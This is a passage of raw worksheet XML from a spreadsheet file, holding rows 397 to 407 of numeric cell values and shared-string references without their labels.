        <v>0</v>
      </c>
      <c r="N397">
        <v>0</v>
      </c>
      <c r="O397">
        <v>0</v>
      </c>
      <c r="P397">
        <v>0</v>
      </c>
      <c r="Q397">
        <v>0</v>
      </c>
      <c r="R397">
        <v>1</v>
      </c>
      <c r="S397">
        <v>0</v>
      </c>
      <c r="T397">
        <v>0</v>
      </c>
      <c r="U397">
        <v>10000</v>
      </c>
      <c r="V397">
        <v>1000</v>
      </c>
      <c r="W397">
        <v>1000</v>
      </c>
      <c r="X397">
        <v>0</v>
      </c>
      <c r="Y397">
        <v>0</v>
      </c>
      <c r="Z397">
        <v>0</v>
      </c>
      <c r="AA397">
        <v>0</v>
      </c>
      <c r="AB397">
        <v>0</v>
      </c>
      <c r="AC397">
        <v>1000</v>
      </c>
      <c r="AD397">
        <v>0</v>
      </c>
      <c r="AE397">
        <v>0</v>
      </c>
      <c r="AF397" t="s">
        <v>3282</v>
      </c>
      <c r="AG397">
        <v>95514</v>
      </c>
      <c r="AH397">
        <v>29</v>
      </c>
      <c r="AJ397">
        <v>383</v>
      </c>
      <c r="AK397" t="s">
        <v>3283</v>
      </c>
      <c r="AL397" t="s">
        <v>3284</v>
      </c>
      <c r="AM397" t="s">
        <v>3285</v>
      </c>
      <c r="AN397" t="s">
        <v>55</v>
      </c>
      <c r="AO397">
        <v>1989</v>
      </c>
      <c r="AP397" t="s">
        <v>3286</v>
      </c>
      <c r="AQ397" t="s">
        <v>3287</v>
      </c>
      <c r="AR397" t="s">
        <v>3282</v>
      </c>
      <c r="AS397" t="s">
        <v>71</v>
      </c>
      <c r="AT397" t="s">
        <v>58</v>
      </c>
      <c r="AU397">
        <v>26</v>
      </c>
      <c r="AV397">
        <v>1</v>
      </c>
      <c r="AW397">
        <v>10</v>
      </c>
      <c r="AX397">
        <v>1</v>
      </c>
      <c r="AY397">
        <v>17</v>
      </c>
      <c r="AZ397">
        <v>7</v>
      </c>
      <c r="BA397" t="s">
        <v>17498</v>
      </c>
      <c r="BB397" t="s">
        <v>15021</v>
      </c>
      <c r="BC397" t="s">
        <v>11743</v>
      </c>
      <c r="BD397" t="s">
        <v>10325</v>
      </c>
    </row>
    <row r="398" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A398">
        <v>1051</v>
      </c>
      <c r="B398" t="s">
        <v>3288</v>
      </c>
      <c r="C398" t="s">
        <v>477</v>
      </c>
      <c r="D398" t="s">
        <v>3289</v>
      </c>
      <c r="E398" t="s">
        <v>142</v>
      </c>
      <c r="F398" t="s">
        <v>3290</v>
      </c>
      <c r="G398" s="1">
        <v>44103</v>
      </c>
      <c r="H398">
        <v>4881</v>
      </c>
      <c r="I398">
        <v>4881</v>
      </c>
      <c r="J398">
        <v>0</v>
      </c>
      <c r="K398">
        <v>1</v>
      </c>
      <c r="L398">
        <v>0</v>
      </c>
      <c r="M398">
        <v>0</v>
      </c>
      <c r="N398">
        <v>0</v>
      </c>
      <c r="O398">
        <v>0</v>
      </c>
      <c r="P398">
        <v>0</v>
      </c>
      <c r="Q398">
        <v>0</v>
      </c>
      <c r="R398">
        <v>0</v>
      </c>
      <c r="S398">
        <v>1</v>
      </c>
      <c r="T398">
        <v>0</v>
      </c>
      <c r="U398">
        <v>0</v>
      </c>
      <c r="V398">
        <v>1</v>
      </c>
      <c r="W398">
        <v>0</v>
      </c>
      <c r="X398">
        <v>0</v>
      </c>
      <c r="Y398">
        <v>0</v>
      </c>
      <c r="Z398">
        <v>0</v>
      </c>
      <c r="AA398">
        <v>0</v>
      </c>
      <c r="AB398">
        <v>0</v>
      </c>
      <c r="AC398">
        <v>0</v>
      </c>
      <c r="AD398">
        <v>1</v>
      </c>
      <c r="AE398">
        <v>0</v>
      </c>
      <c r="AF398" t="s">
        <v>3291</v>
      </c>
      <c r="AG398">
        <v>95379</v>
      </c>
      <c r="AH398">
        <v>29</v>
      </c>
      <c r="AJ398">
        <v>376</v>
      </c>
      <c r="AK398" t="s">
        <v>3292</v>
      </c>
      <c r="AL398" t="s">
        <v>3293</v>
      </c>
      <c r="AM398" t="s">
        <v>3294</v>
      </c>
      <c r="AN398" t="s">
        <v>55</v>
      </c>
      <c r="AO398">
        <v>2018</v>
      </c>
      <c r="AP398">
        <v>82187343113</v>
      </c>
      <c r="AQ398" t="s">
        <v>3295</v>
      </c>
      <c r="AR398" t="s">
        <v>3296</v>
      </c>
      <c r="AS398" t="s">
        <v>71</v>
      </c>
      <c r="AT398" t="s">
        <v>58</v>
      </c>
      <c r="AU398">
        <v>6</v>
      </c>
      <c r="AV398">
        <v>0</v>
      </c>
      <c r="AW398">
        <v>0</v>
      </c>
      <c r="AX398">
        <v>0</v>
      </c>
      <c r="AY398">
        <v>6</v>
      </c>
      <c r="AZ398">
        <v>2</v>
      </c>
      <c r="BA398" t="s">
        <v>17497</v>
      </c>
      <c r="BB398" t="s">
        <v>15020</v>
      </c>
      <c r="BC398" t="s">
        <v>9536</v>
      </c>
      <c r="BD398">
        <v>0</v>
      </c>
    </row>
    <row r="399" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A399">
        <v>892</v>
      </c>
      <c r="B399" t="s">
        <v>3297</v>
      </c>
      <c r="C399" t="s">
        <v>74</v>
      </c>
      <c r="D399" t="s">
        <v>3298</v>
      </c>
      <c r="E399" t="s">
        <v>142</v>
      </c>
      <c r="F399" t="s">
        <v>3299</v>
      </c>
      <c r="G399" s="1">
        <v>44053</v>
      </c>
      <c r="H399">
        <v>4915</v>
      </c>
      <c r="I399">
        <v>4915</v>
      </c>
      <c r="J399">
        <v>0</v>
      </c>
      <c r="K399">
        <v>2</v>
      </c>
      <c r="L399">
        <v>2</v>
      </c>
      <c r="M399">
        <v>0</v>
      </c>
      <c r="N399">
        <v>0</v>
      </c>
      <c r="O399">
        <v>0</v>
      </c>
      <c r="P399">
        <v>0</v>
      </c>
      <c r="Q399">
        <v>0</v>
      </c>
      <c r="R399">
        <v>40</v>
      </c>
      <c r="S399">
        <v>0</v>
      </c>
      <c r="T399">
        <v>0</v>
      </c>
      <c r="U399">
        <v>0</v>
      </c>
      <c r="V399">
        <v>300000</v>
      </c>
      <c r="W399">
        <v>5000</v>
      </c>
      <c r="X399">
        <v>0</v>
      </c>
      <c r="Y399">
        <v>0</v>
      </c>
      <c r="Z399">
        <v>0</v>
      </c>
      <c r="AA399">
        <v>0</v>
      </c>
      <c r="AB399">
        <v>0</v>
      </c>
      <c r="AC399">
        <v>4000</v>
      </c>
      <c r="AD399">
        <v>0</v>
      </c>
      <c r="AE399">
        <v>0</v>
      </c>
      <c r="AF399" t="s">
        <v>3300</v>
      </c>
      <c r="AG399">
        <v>51141</v>
      </c>
      <c r="AH399">
        <v>14</v>
      </c>
      <c r="AJ399">
        <v>221</v>
      </c>
      <c r="AK399" t="s">
        <v>3301</v>
      </c>
      <c r="AL399" t="s">
        <v>3302</v>
      </c>
      <c r="AM399" t="s">
        <v>3303</v>
      </c>
      <c r="AN399" t="s">
        <v>55</v>
      </c>
      <c r="AO399">
        <v>2016</v>
      </c>
      <c r="AP399" t="s">
        <v>3304</v>
      </c>
      <c r="AQ399" t="s">
        <v>3305</v>
      </c>
      <c r="AR399" t="s">
        <v>3306</v>
      </c>
      <c r="AS399" t="s">
        <v>71</v>
      </c>
      <c r="AT399" t="s">
        <v>72</v>
      </c>
      <c r="AU399">
        <v>25</v>
      </c>
      <c r="AV399">
        <v>1</v>
      </c>
      <c r="AW399">
        <v>0</v>
      </c>
      <c r="AX399">
        <v>13</v>
      </c>
      <c r="AY399">
        <v>3</v>
      </c>
      <c r="AZ399">
        <v>3</v>
      </c>
      <c r="BA399" t="s">
        <v>17444</v>
      </c>
      <c r="BB399" t="s">
        <v>14919</v>
      </c>
      <c r="BC399" t="s">
        <v>11460</v>
      </c>
      <c r="BD399" t="s">
        <v>11461</v>
      </c>
    </row>
    <row r="400" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A400">
        <v>1384</v>
      </c>
      <c r="B400" t="s">
        <v>1719</v>
      </c>
      <c r="C400" t="s">
        <v>47</v>
      </c>
      <c r="D400" t="s">
        <v>3307</v>
      </c>
      <c r="E400" t="s">
        <v>142</v>
      </c>
      <c r="F400" t="s">
        <v>3308</v>
      </c>
      <c r="G400" s="1">
        <v>44320</v>
      </c>
      <c r="H400">
        <v>5004</v>
      </c>
      <c r="I400">
        <v>5004</v>
      </c>
      <c r="J400">
        <v>3</v>
      </c>
      <c r="K400">
        <v>0</v>
      </c>
      <c r="L400">
        <v>2</v>
      </c>
      <c r="M400">
        <v>1</v>
      </c>
      <c r="N400">
        <v>700</v>
      </c>
      <c r="O400">
        <v>0</v>
      </c>
      <c r="P400">
        <v>0</v>
      </c>
      <c r="Q400">
        <v>7</v>
      </c>
      <c r="R400">
        <v>0</v>
      </c>
      <c r="S400">
        <v>0</v>
      </c>
      <c r="T400">
        <v>1</v>
      </c>
      <c r="U400">
        <v>1000000</v>
      </c>
      <c r="V400">
        <v>0</v>
      </c>
      <c r="W400">
        <v>15640</v>
      </c>
      <c r="X400">
        <v>1020</v>
      </c>
      <c r="Y400">
        <v>0</v>
      </c>
      <c r="Z400">
        <v>0</v>
      </c>
      <c r="AA400">
        <v>0</v>
      </c>
      <c r="AB400">
        <v>7000</v>
      </c>
      <c r="AC400">
        <v>0</v>
      </c>
      <c r="AD400">
        <v>0</v>
      </c>
      <c r="AE400">
        <v>1800000</v>
      </c>
      <c r="AF400" t="s">
        <v>3309</v>
      </c>
      <c r="AG400">
        <v>21161</v>
      </c>
      <c r="AH400">
        <v>2</v>
      </c>
      <c r="AJ400">
        <v>32</v>
      </c>
      <c r="AK400" t="s">
        <v>3310</v>
      </c>
      <c r="AL400" t="s">
        <v>3311</v>
      </c>
      <c r="AM400" t="s">
        <v>3312</v>
      </c>
      <c r="AN400" t="s">
        <v>82</v>
      </c>
      <c r="AO400">
        <v>2015</v>
      </c>
      <c r="AP400" t="s">
        <v>3313</v>
      </c>
      <c r="AQ400" t="s">
        <v>3314</v>
      </c>
      <c r="AR400" t="s">
        <v>3315</v>
      </c>
      <c r="AS400" t="s">
        <v>71</v>
      </c>
      <c r="AT400" t="s">
        <v>86</v>
      </c>
      <c r="AU400">
        <v>6</v>
      </c>
      <c r="AV400">
        <v>1</v>
      </c>
      <c r="AW400">
        <v>37</v>
      </c>
      <c r="AX400">
        <v>57</v>
      </c>
      <c r="AY400">
        <v>94</v>
      </c>
      <c r="AZ400">
        <v>57</v>
      </c>
      <c r="BA400" t="s">
        <v>16866</v>
      </c>
      <c r="BB400" t="s">
        <v>14723</v>
      </c>
      <c r="BC400">
        <v>0</v>
      </c>
      <c r="BD400" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="401" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A401">
        <v>940</v>
      </c>
      <c r="B401" t="s">
        <v>3316</v>
      </c>
      <c r="C401" t="s">
        <v>157</v>
      </c>
      <c r="D401" t="s">
        <v>3317</v>
      </c>
      <c r="E401" t="s">
        <v>131</v>
      </c>
      <c r="F401" t="s">
        <v>3318</v>
      </c>
      <c r="G401" s="1">
        <v>44155</v>
      </c>
      <c r="H401">
        <v>5083</v>
      </c>
      <c r="I401">
        <v>5083</v>
      </c>
      <c r="J401">
        <v>0</v>
      </c>
      <c r="K401">
        <v>0</v>
      </c>
      <c r="L401">
        <v>0</v>
      </c>
      <c r="M401">
        <v>0</v>
      </c>
      <c r="N401">
        <v>0</v>
      </c>
      <c r="O401">
        <v>0</v>
      </c>
      <c r="P401">
        <v>0</v>
      </c>
      <c r="Q401">
        <v>0</v>
      </c>
      <c r="R401">
        <v>0</v>
      </c>
      <c r="S401">
        <v>0</v>
      </c>
      <c r="T401">
        <v>1</v>
      </c>
      <c r="U401">
        <v>0</v>
      </c>
      <c r="V401">
        <v>0</v>
      </c>
      <c r="W401">
        <v>0</v>
      </c>
      <c r="X401">
        <v>0</v>
      </c>
      <c r="Y401">
        <v>0</v>
      </c>
      <c r="Z401">
        <v>0</v>
      </c>
      <c r="AA401">
        <v>0</v>
      </c>
      <c r="AB401">
        <v>0</v>
      </c>
      <c r="AC401">
        <v>0</v>
      </c>
      <c r="AD401">
        <v>0</v>
      </c>
      <c r="AE401">
        <v>20000</v>
      </c>
      <c r="AF401" t="s">
        <v>3319</v>
      </c>
      <c r="AG401">
        <v>67155</v>
      </c>
      <c r="AH401">
        <v>16</v>
      </c>
      <c r="AJ401">
        <v>241</v>
      </c>
      <c r="AK401" t="s">
        <v>1231</v>
      </c>
      <c r="AL401" t="s">
        <v>3320</v>
      </c>
      <c r="AM401" t="s">
        <v>3321</v>
      </c>
      <c r="AN401" t="s">
        <v>68</v>
      </c>
      <c r="AO401">
        <v>1995</v>
      </c>
      <c r="AP401" t="s">
        <v>3322</v>
      </c>
      <c r="AQ401" t="s">
        <v>3323</v>
      </c>
      <c r="AR401" t="s">
        <v>3319</v>
      </c>
      <c r="AS401" t="s">
        <v>371</v>
      </c>
      <c r="AT401" t="s">
        <v>72</v>
      </c>
      <c r="AU401">
        <v>25</v>
      </c>
      <c r="AV401">
        <v>2</v>
      </c>
      <c r="AW401">
        <v>7</v>
      </c>
      <c r="AX401">
        <v>0</v>
      </c>
      <c r="AY401">
        <v>2</v>
      </c>
      <c r="AZ401">
        <v>3</v>
      </c>
      <c r="BA401" t="s">
        <v>17373</v>
      </c>
      <c r="BB401" t="s">
        <v>14951</v>
      </c>
      <c r="BC401" t="s">
        <v>11804</v>
      </c>
      <c r="BD401" t="s">
        <v>10330</v>
      </c>
    </row>
    <row r="402" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A402">
        <v>1287</v>
      </c>
      <c r="B402" t="s">
        <v>3324</v>
      </c>
      <c r="C402" t="s">
        <v>168</v>
      </c>
      <c r="D402" t="s">
        <v>3325</v>
      </c>
      <c r="E402" t="s">
        <v>944</v>
      </c>
      <c r="F402" t="s">
        <v>3326</v>
      </c>
      <c r="G402" s="1">
        <v>44067</v>
      </c>
      <c r="H402">
        <v>5102</v>
      </c>
      <c r="I402">
        <v>5102</v>
      </c>
      <c r="J402">
        <v>1</v>
      </c>
      <c r="K402">
        <v>0</v>
      </c>
      <c r="L402">
        <v>1</v>
      </c>
      <c r="M402">
        <v>0</v>
      </c>
      <c r="N402">
        <v>0</v>
      </c>
      <c r="O402">
        <v>0</v>
      </c>
      <c r="P402">
        <v>2</v>
      </c>
      <c r="Q402">
        <v>2</v>
      </c>
      <c r="R402">
        <v>1</v>
      </c>
      <c r="S402">
        <v>1</v>
      </c>
      <c r="T402">
        <v>1</v>
      </c>
      <c r="U402">
        <v>25000</v>
      </c>
      <c r="V402">
        <v>0</v>
      </c>
      <c r="W402">
        <v>3000</v>
      </c>
      <c r="X402">
        <v>0</v>
      </c>
      <c r="Y402">
        <v>0</v>
      </c>
      <c r="Z402">
        <v>0</v>
      </c>
      <c r="AA402">
        <v>30</v>
      </c>
      <c r="AB402">
        <v>300</v>
      </c>
      <c r="AC402">
        <v>1000</v>
      </c>
      <c r="AD402">
        <v>330</v>
      </c>
      <c r="AE402">
        <v>70000</v>
      </c>
      <c r="AF402" t="s">
        <v>3327</v>
      </c>
      <c r="AG402">
        <v>41371</v>
      </c>
      <c r="AH402">
        <v>13</v>
      </c>
      <c r="AJ402">
        <v>175</v>
      </c>
      <c r="AK402" t="s">
        <v>3328</v>
      </c>
      <c r="AL402" t="s">
        <v>3329</v>
      </c>
      <c r="AM402" t="s">
        <v>3330</v>
      </c>
      <c r="AN402" t="s">
        <v>55</v>
      </c>
      <c r="AO402">
        <v>1989</v>
      </c>
      <c r="AP402">
        <v>267431331</v>
      </c>
      <c r="AQ402" t="s">
        <v>3331</v>
      </c>
      <c r="AR402" t="s">
        <v>3332</v>
      </c>
      <c r="AS402" t="s">
        <v>71</v>
      </c>
      <c r="AT402" t="s">
        <v>58</v>
      </c>
      <c r="AU402">
        <v>26</v>
      </c>
      <c r="AV402">
        <v>1</v>
      </c>
      <c r="AW402">
        <v>4</v>
      </c>
      <c r="AX402">
        <v>36</v>
      </c>
      <c r="AY402">
        <v>0</v>
      </c>
      <c r="AZ402">
        <v>2</v>
      </c>
      <c r="BA402" t="s">
        <v>16839</v>
      </c>
      <c r="BB402" t="s">
        <v>15175</v>
      </c>
      <c r="BC402" t="s">
        <v>11131</v>
      </c>
      <c r="BD402" t="s">
        <v>11518</v>
      </c>
    </row>
    <row r="403" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A403">
        <v>999</v>
      </c>
      <c r="B403" t="s">
        <v>3333</v>
      </c>
      <c r="C403" t="s">
        <v>129</v>
      </c>
      <c r="D403" t="s">
        <v>3334</v>
      </c>
      <c r="E403" t="s">
        <v>142</v>
      </c>
      <c r="F403" t="s">
        <v>1420</v>
      </c>
      <c r="G403" s="1">
        <v>44224</v>
      </c>
      <c r="H403">
        <v>5215</v>
      </c>
      <c r="I403">
        <v>5215</v>
      </c>
      <c r="J403">
        <v>1</v>
      </c>
      <c r="K403">
        <v>1</v>
      </c>
      <c r="L403">
        <v>0</v>
      </c>
      <c r="M403">
        <v>0</v>
      </c>
      <c r="N403">
        <v>0</v>
      </c>
      <c r="O403">
        <v>0</v>
      </c>
      <c r="P403">
        <v>0</v>
      </c>
      <c r="Q403">
        <v>0</v>
      </c>
      <c r="R403">
        <v>0</v>
      </c>
      <c r="S403">
        <v>0</v>
      </c>
      <c r="T403">
        <v>0</v>
      </c>
      <c r="U403">
        <v>1000000</v>
      </c>
      <c r="V403">
        <v>1000000</v>
      </c>
      <c r="W403">
        <v>0</v>
      </c>
      <c r="X403">
        <v>0</v>
      </c>
      <c r="Y403">
        <v>0</v>
      </c>
      <c r="Z403">
        <v>0</v>
      </c>
      <c r="AA403">
        <v>0</v>
      </c>
      <c r="AB403">
        <v>0</v>
      </c>
      <c r="AC403">
        <v>0</v>
      </c>
      <c r="AD403">
        <v>0</v>
      </c>
      <c r="AE403">
        <v>0</v>
      </c>
      <c r="AF403" t="s">
        <v>3335</v>
      </c>
      <c r="AG403">
        <v>15213</v>
      </c>
      <c r="AH403">
        <v>11</v>
      </c>
      <c r="AJ403">
        <v>268</v>
      </c>
      <c r="AK403" t="s">
        <v>252</v>
      </c>
      <c r="AL403" t="s">
        <v>252</v>
      </c>
      <c r="AM403" t="s">
        <v>3336</v>
      </c>
      <c r="AN403" t="s">
        <v>55</v>
      </c>
      <c r="AO403">
        <v>2002</v>
      </c>
      <c r="AP403">
        <v>2143937888</v>
      </c>
      <c r="AQ403" t="s">
        <v>3337</v>
      </c>
      <c r="AR403" t="s">
        <v>3338</v>
      </c>
      <c r="AS403" t="s">
        <v>71</v>
      </c>
      <c r="AT403" t="s">
        <v>58</v>
      </c>
      <c r="AU403">
        <v>7</v>
      </c>
      <c r="AV403">
        <v>3</v>
      </c>
      <c r="AW403">
        <v>3</v>
      </c>
      <c r="AX403">
        <v>0</v>
      </c>
      <c r="AY403">
        <v>4</v>
      </c>
      <c r="AZ403">
        <v>1</v>
      </c>
      <c r="BA403" t="s">
        <v>17458</v>
      </c>
      <c r="BB403" t="s">
        <v>14561</v>
      </c>
      <c r="BC403">
        <v>0</v>
      </c>
      <c r="BD403" t="s">
        <v>11708</v>
      </c>
    </row>
    <row r="404" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A404">
        <v>919</v>
      </c>
      <c r="B404" t="s">
        <v>3339</v>
      </c>
      <c r="C404" t="s">
        <v>74</v>
      </c>
      <c r="D404" t="s">
        <v>3340</v>
      </c>
      <c r="E404" t="s">
        <v>49</v>
      </c>
      <c r="F404" t="s">
        <v>3341</v>
      </c>
      <c r="G404" s="1">
        <v>44258</v>
      </c>
      <c r="H404">
        <v>5233</v>
      </c>
      <c r="I404">
        <v>5233</v>
      </c>
      <c r="J404">
        <v>0</v>
      </c>
      <c r="K404">
        <v>0</v>
      </c>
      <c r="L404">
        <v>0</v>
      </c>
      <c r="M404">
        <v>2</v>
      </c>
      <c r="N404">
        <v>0</v>
      </c>
      <c r="O404">
        <v>0</v>
      </c>
      <c r="P404">
        <v>0</v>
      </c>
      <c r="Q404">
        <v>3</v>
      </c>
      <c r="R404">
        <v>2</v>
      </c>
      <c r="S404">
        <v>0</v>
      </c>
      <c r="T404">
        <v>1</v>
      </c>
      <c r="U404">
        <v>0</v>
      </c>
      <c r="V404">
        <v>0</v>
      </c>
      <c r="W404">
        <v>0</v>
      </c>
      <c r="X404">
        <v>0</v>
      </c>
      <c r="Y404">
        <v>0</v>
      </c>
      <c r="Z404">
        <v>0</v>
      </c>
      <c r="AA404">
        <v>0</v>
      </c>
      <c r="AB404">
        <v>0</v>
      </c>
      <c r="AC404">
        <v>0</v>
      </c>
      <c r="AD404">
        <v>0</v>
      </c>
      <c r="AE404">
        <v>0</v>
      </c>
      <c r="AF404" t="s">
        <v>3342</v>
      </c>
      <c r="AG404">
        <v>57372</v>
      </c>
      <c r="AH404">
        <v>14</v>
      </c>
      <c r="AJ404">
        <v>196</v>
      </c>
      <c r="AK404" t="s">
        <v>3343</v>
      </c>
      <c r="AL404" t="s">
        <v>3344</v>
      </c>
      <c r="AM404" t="s">
        <v>3345</v>
      </c>
      <c r="AN404" t="s">
        <v>68</v>
      </c>
      <c r="AO404">
        <v>2014</v>
      </c>
      <c r="AP404" t="s">
        <v>3346</v>
      </c>
      <c r="AQ404" t="s">
        <v>3347</v>
      </c>
      <c r="AR404" t="s">
        <v>3342</v>
      </c>
      <c r="AS404" t="s">
        <v>71</v>
      </c>
      <c r="AT404" t="s">
        <v>72</v>
      </c>
      <c r="AU404">
        <v>0</v>
      </c>
      <c r="AV404">
        <v>0</v>
      </c>
      <c r="AW404">
        <v>0</v>
      </c>
      <c r="AX404">
        <v>3</v>
      </c>
      <c r="AY404">
        <v>6</v>
      </c>
      <c r="AZ404">
        <v>1</v>
      </c>
      <c r="BA404" t="s">
        <v>17440</v>
      </c>
      <c r="BB404" t="s">
        <v>14937</v>
      </c>
      <c r="BC404" t="s">
        <v>11581</v>
      </c>
      <c r="BD404">
        <v>0</v>
      </c>
    </row>
    <row r="405" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A405">
        <v>1500</v>
      </c>
      <c r="B405" t="s">
        <v>3348</v>
      </c>
      <c r="C405" t="s">
        <v>157</v>
      </c>
      <c r="D405" t="s">
        <v>3349</v>
      </c>
      <c r="E405" t="s">
        <v>944</v>
      </c>
      <c r="F405" t="s">
        <v>2105</v>
      </c>
      <c r="G405" s="1">
        <v>44265</v>
      </c>
      <c r="H405">
        <v>5246</v>
      </c>
      <c r="I405">
        <v>5246</v>
      </c>
      <c r="J405">
        <v>3</v>
      </c>
      <c r="K405">
        <v>0</v>
      </c>
      <c r="L405">
        <v>2</v>
      </c>
      <c r="M405">
        <v>0</v>
      </c>
      <c r="N405">
        <v>0</v>
      </c>
      <c r="O405">
        <v>0</v>
      </c>
      <c r="P405">
        <v>2</v>
      </c>
      <c r="Q405">
        <v>20</v>
      </c>
      <c r="R405">
        <v>11</v>
      </c>
      <c r="S405">
        <v>1</v>
      </c>
      <c r="T405">
        <v>1</v>
      </c>
      <c r="U405">
        <v>250</v>
      </c>
      <c r="V405">
        <v>0</v>
      </c>
      <c r="W405">
        <v>10</v>
      </c>
      <c r="X405">
        <v>0</v>
      </c>
      <c r="Y405">
        <v>0</v>
      </c>
      <c r="Z405">
        <v>0</v>
      </c>
      <c r="AA405">
        <v>800</v>
      </c>
      <c r="AB405">
        <v>500</v>
      </c>
      <c r="AC405">
        <v>10</v>
      </c>
      <c r="AD405">
        <v>1</v>
      </c>
      <c r="AE405">
        <v>75000</v>
      </c>
      <c r="AF405" t="s">
        <v>3350</v>
      </c>
      <c r="AG405">
        <v>68472</v>
      </c>
      <c r="AH405">
        <v>16</v>
      </c>
      <c r="AJ405">
        <v>237</v>
      </c>
      <c r="AK405" t="s">
        <v>377</v>
      </c>
      <c r="AL405" t="s">
        <v>378</v>
      </c>
      <c r="AM405" t="s">
        <v>3351</v>
      </c>
      <c r="AN405" t="s">
        <v>55</v>
      </c>
      <c r="AO405">
        <v>1999</v>
      </c>
      <c r="AP405" t="s">
        <v>3352</v>
      </c>
      <c r="AQ405" t="s">
        <v>3353</v>
      </c>
      <c r="AR405" t="s">
        <v>3350</v>
      </c>
      <c r="AS405" t="s">
        <v>71</v>
      </c>
      <c r="AT405" t="s">
        <v>58</v>
      </c>
      <c r="AU405">
        <v>30</v>
      </c>
      <c r="AV405">
        <v>1</v>
      </c>
      <c r="AW405">
        <v>10</v>
      </c>
      <c r="AX405">
        <v>5</v>
      </c>
      <c r="AY405">
        <v>0</v>
      </c>
      <c r="AZ405">
        <v>3</v>
      </c>
      <c r="BA405" t="s">
        <v>16915</v>
      </c>
      <c r="BB405" t="s">
        <v>15323</v>
      </c>
      <c r="BC405" t="s">
        <v>9952</v>
      </c>
      <c r="BD405">
        <v>0</v>
      </c>
    </row>
    <row r="406" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A406">
        <v>1400</v>
      </c>
      <c r="B406" t="s">
        <v>3354</v>
      </c>
      <c r="C406" t="s">
        <v>458</v>
      </c>
      <c r="D406" t="s">
        <v>3355</v>
      </c>
      <c r="E406" t="s">
        <v>111</v>
      </c>
      <c r="F406" t="s">
        <v>3356</v>
      </c>
      <c r="G406" s="1">
        <v>44095</v>
      </c>
      <c r="H406">
        <v>5288</v>
      </c>
      <c r="I406">
        <v>5288</v>
      </c>
      <c r="J406">
        <v>1</v>
      </c>
      <c r="K406">
        <v>1</v>
      </c>
      <c r="L406">
        <v>0</v>
      </c>
      <c r="M406">
        <v>3</v>
      </c>
      <c r="N406">
        <v>0</v>
      </c>
      <c r="O406">
        <v>0</v>
      </c>
      <c r="P406">
        <v>0</v>
      </c>
      <c r="Q406">
        <v>0</v>
      </c>
      <c r="R406">
        <v>0</v>
      </c>
      <c r="S406">
        <v>1</v>
      </c>
      <c r="T406">
        <v>0</v>
      </c>
      <c r="U406">
        <v>200000</v>
      </c>
      <c r="V406">
        <v>0</v>
      </c>
      <c r="W406">
        <v>0</v>
      </c>
      <c r="X406">
        <v>300000</v>
      </c>
      <c r="Y406">
        <v>0</v>
      </c>
      <c r="Z406">
        <v>0</v>
      </c>
      <c r="AA406">
        <v>0</v>
      </c>
      <c r="AB406">
        <v>0</v>
      </c>
      <c r="AC406">
        <v>0</v>
      </c>
      <c r="AD406">
        <v>1</v>
      </c>
      <c r="AE406">
        <v>0</v>
      </c>
      <c r="AF406" t="s">
        <v>3357</v>
      </c>
      <c r="AG406">
        <v>29115</v>
      </c>
      <c r="AH406">
        <v>5</v>
      </c>
      <c r="AJ406">
        <v>154</v>
      </c>
      <c r="AK406" t="s">
        <v>3358</v>
      </c>
      <c r="AL406" t="s">
        <v>3359</v>
      </c>
      <c r="AM406" t="s">
        <v>3360</v>
      </c>
      <c r="AN406" t="s">
        <v>55</v>
      </c>
      <c r="AO406">
        <v>2018</v>
      </c>
      <c r="AP406">
        <v>85272121602</v>
      </c>
      <c r="AQ406">
        <v>85272121602</v>
      </c>
      <c r="AR406" t="s">
        <v>3361</v>
      </c>
      <c r="AS406" t="s">
        <v>71</v>
      </c>
      <c r="AT406" t="s">
        <v>58</v>
      </c>
      <c r="AU406">
        <v>26</v>
      </c>
      <c r="AV406">
        <v>1</v>
      </c>
      <c r="AW406">
        <v>0</v>
      </c>
      <c r="AX406">
        <v>0</v>
      </c>
      <c r="AY406">
        <v>10</v>
      </c>
      <c r="AZ406">
        <v>3</v>
      </c>
      <c r="BA406" t="s">
        <v>16874</v>
      </c>
      <c r="BB406" t="s">
        <v>15251</v>
      </c>
      <c r="BC406" t="s">
        <v>11727</v>
      </c>
      <c r="BD406" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="407" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A407">
        <v>930</v>
      </c>
      <c r="B407" t="s">
        <v>3362</v>
      </c>
      <c r="C407" t="s">
        <v>199</v>
      </c>
      <c r="D407" t="s">
        <v>3363</v>
      </c>
      <c r="E407" t="s">
        <v>300</v>
      </c>
      <c r="F407" t="s">
        <v>1961</v>
      </c>
      <c r="G407" s="1">
        <v>44165</v>
      </c>
      <c r="H407">
        <v>5291</v>
      </c>
      <c r="I407">
        <v>5291</v>
      </c>
      <c r="J407">
        <v>2</v>
      </c>
      <c r="K407">
        <v>1</v>
      </c>
      <c r="L407">
        <v>4</v>
      </c>
      <c r="M407">
        <v>2</v>
      </c>
      <c r="N407">
        <v>0</v>
      </c>
      <c r="O407">
        <v>0</v>
      </c>
      <c r="P407">
        <v>3</v>
      </c>
      <c r="Q407">
        <v>2</v>
      </c>
      <c r="R407">
        <v>2</v>
      </c>
      <c r="S407">
        <v>0</v>
      </c>
      <c r="T407">
        <v>0</v>
      </c>
      <c r="U407">
        <v>400000</v>
      </c>
      <c r="V407">
        <v>15000</v>
      </c>
      <c r="W407">
        <v>20000</v>
      </c>
      <c r="X407">
        <v>4000</v>
      </c>
      <c r="Y407">
        <v>0</v>
      </c>
      <c r="Z407">
        <v>0</v>
      </c>
      <c r="AA407">
        <v>0</v>
      </c>
      <c r="AB407">
        <v>1000</v>
      </c>
      <c r="AC407">
        <v>1000</v>
      </c>
      <c r="AD407">
        <v>0</v>
      </c>
      <c r="AE407">
        <v>0</v>
      </c>
      <c r="AF407" t="s">
        <v>3364</v>
      </c>
      <c r="AG407">
        <v>23127</v>
      </c>
      <c r="AH407">
        <v>1</v>
      </c>
      <c r="AJ407">
        <v>19</v>
      </c>
      <c r="AK407" t="s">
        <v>2558</v>
      </c>
      <c r="AL407" t="s">
        <v>2559</v>
      </c>
      <c r="AM407" t="s">
        <v>3365</v>
      </c>
      <c r="AN407" t="s">
        <v>55</v>
      </c>
